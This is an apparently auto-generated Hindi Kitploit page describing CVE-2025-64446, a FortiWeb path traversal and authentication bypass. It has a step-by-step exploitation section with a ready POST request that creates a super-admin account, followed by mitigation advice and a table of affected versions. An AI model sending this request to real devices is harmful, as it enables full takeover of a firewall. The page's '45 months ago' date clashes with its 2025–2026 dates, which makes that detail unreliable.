Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-64446 — CVE-2025-64446 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2025-64446
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xblackash/cve-2025-64446

CVE-2025-64446

CVE-2025-64446

रिपॉजिटरी देखें
45 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ CVE-2025-64446 - FortiWeb क्रिटिकल प्रमाणीकरण बाईपास और पथ ट्रैवर्सल

Linux 6 15 Released (18) (1)

Severity Fortinet Exploited

एक गंभीर अप्रमाणित भेद्यता जो दूरस्थ हमलावरों को FortiWeb उपकरणों पर व्यवस्थापक खाते बनाने की अनुमति देती है।


📌 अवलोकन

CVE-2025-64446 FortiWeb वेब एप्लिकेशन फ़ायरवॉल प्रबंधन इंटरफ़ेस में एक गंभीर सापेक्ष पथ ट्रैवर्सल भेद्यता है।

एक अप्रमाणित दूरस्थ हमलावर इस दोष का शोषण करके प्रमाणीकरण को बायपास कर सकता है और पूर्ण विशेषाधिकारों वाले नए व्यवस्थापक उपयोगकर्ता बना सकता है, जिससे उपकरण पूरी तरह से समझौता हो सकता है।

  • CVSS v3.1 स्कोर: 9.8 (क्रिटिकल)
  • हमले का प्रकार: अप्रमाणित दूरस्थ
  • प्रभाव: पूर्ण प्रशासनिक अधिग्रहण
  • स्थिति: वास्तविक दुनिया में सक्रिय रूप से शोषित

🛠️ प्रभावित संस्करण

सिफारिश: जितनी जल्दी हो सके नवीनतम पैच किए गए संस्करण में अपडेट करें।


🔥 हमलावर इस भेद्यता का शोषण कैसे करते हैं

चरण-दर-चरण शोषण

  1. लक्ष्य पहचान
    हमलावर सार्वजनिक रूप से उजागर FortiWeb प्रबंधन इंटरफ़ेस (आमतौर पर HTTPS पोर्ट 443 या 8443 पर) के लिए स्कैन करता है।

  2. दुर्भावनापूर्ण अनुरोध तैयार करना
    शोषण का मूल एक सापेक्ष पथ ट्रैवर्सल (../) है जो एक विशेष रूप से तैयार URL के साथ जुड़ा होता है जो एक आंतरिक अप्रमाणित CGI एंडपॉइंट तक पहुँचता है।

    भेद्य एंडपॉइंट पैटर्न:

    root@kitploit:~
    /api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
    
  3. शोषण भेजना

    हमलावर एक नया व्यवस्थापक खाता बनाने के लिए JSON पेलोड के साथ एक एकल POST अनुरोध भेजता है।

    शोषण अनुरोध का उदाहरण:

    root@kitploit:~
    POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
    Host: target-fortiweb.example.com
    Content-Type: application/json
    
    {
      "name": "hackedadmin",
      "password": "AttackerPass123!",
      "access_profile": "super_admin",
      "type": "local"
    }
    
  4. सफल शोषण

    यदि सफल होता है, तो FortiWeb बिना किसी पूर्व प्रमाणीकरण की आवश्यकता के नया व्यवस्थापक खाता बना देता है। हमलावर फिर नवनिर्मित क्रेडेंशियल के साथ लॉग इन कर सकता है और WAF का पूर्ण नियंत्रण प्राप्त कर सकता है।

यह क्यों काम करता है

प्रबंधन API पथ को ठीक से स्वच्छ करने में विफल रहता है, जिससे अनुरोध वापस पुराने fwbcgi बाइनरी तक पहुँच जाता है, जो कुछ संचालनों पर प्रमाणीकरण लागू नहीं करता।


📸 स्क्रीनशॉट

Fortinet0day 3 Fortinet0day Fortinet0day 1 Fortinet0day 2

🛡️ शमन और सर्वोत्तम अभ्यास

  • FortiWeb को तुरंत एक स्थिर संस्करण में अपग्रेड करें
  • प्रबंधन इंटरफ़ेस को कभी भी सीधे इंटरनेट पर उजागर न करें
  • प्रशासनिक पहुँच के लिए मजबूत नेटवर्क विभाजन और VPN का उपयोग करें
  • fwbcgi, ../, या असामान्य व्यवस्थापक निर्माण प्रयासों वाले अनुरोधों के लिए लॉग की निगरानी करें
  • संदिग्ध प्रविष्टियों के लिए नियमित रूप से व्यवस्थापक खातों का ऑडिट करें

केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान उद्देश्यों के लिए।

साइबर सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया

अंतिम अद्यतन: अप्रैल 2026

टूल डाउनलोड करें
उत्पादप्रभावित संस्करणस्थिर संस्करण
FortiWeb 8.08.0.0 – 8.0.18.0.2 और उससे ऊपर
FortiWeb 7.67.6.0 – 7.6.47.6.5 और उससे ऊपर
FortiWeb 7.47.4.0 – 7.4.97.4.10 और उससे ऊपर
FortiWeb 7.27.2.0 – 7.2.117.2.12 और उससे ऊपर
FortiWeb 7.07.0.0 – 7.0.117.0.12 और उससे ऊपर